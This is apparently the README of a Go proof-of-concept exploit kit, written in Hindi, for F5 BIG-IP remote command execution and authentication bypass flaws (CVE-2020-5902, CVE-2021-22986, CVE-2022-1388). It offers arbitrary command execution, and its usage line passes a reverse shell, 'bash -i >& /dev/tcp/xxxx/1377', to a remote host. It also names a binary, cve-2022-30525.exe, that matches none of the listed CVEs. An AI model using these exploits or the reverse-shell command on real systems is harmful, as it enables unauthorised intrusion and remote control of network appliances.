
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC संग्रह
CVE-2020-5902, CVE-2021-22986 और CVE-2022-1388 का POC संग्रह Go भाषा में लिखा गया है, भविष्य में F5 के अन्य POC जोड़े जाएँगे
author:160team.west9B
यह केवल अधिकृत परिस्थितियों में सुरक्षा शोधकर्ताओं के उपयोग के लिए है। नेटवर्क सुरक्षा कानून का पालन करें। किसी भी समस्या के परिणाम के लिए उपयोगकर्ता स्वयं जिम्मेदार होगा, लेखक से कोई संबंध नहीं है।
F5 POC संग्रह:
CVE-2020-5902: F5 BIG-IP दूरस्थ कोड निष्पादन भेद्यता
CVE-2021-22986: F5 BIG-IP iControl REST अनधिकृत दूरस्थ कमांड निष्पादन भेद्यता
CVE-2022-1388: प्रमाणीकरण बायपास दूरस्थ कमांड निष्पादन
CVE-2020-5902 सत्यापन मनमानी फ़ाइल डाउनलोड का उपयोग करता है, /etc/passwd लौटने पर भेद्यता मौजूद है
CVE-2021-22986 और CVE-2022-1388 का POC डिफ़ॉल्ट रूप से id कमांड निष्पादित करता है, {id} लौटने पर भेद्यता मौजूद है, -c का उपयोग करके कस्टम कमांड सेट किया जा सकता है
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"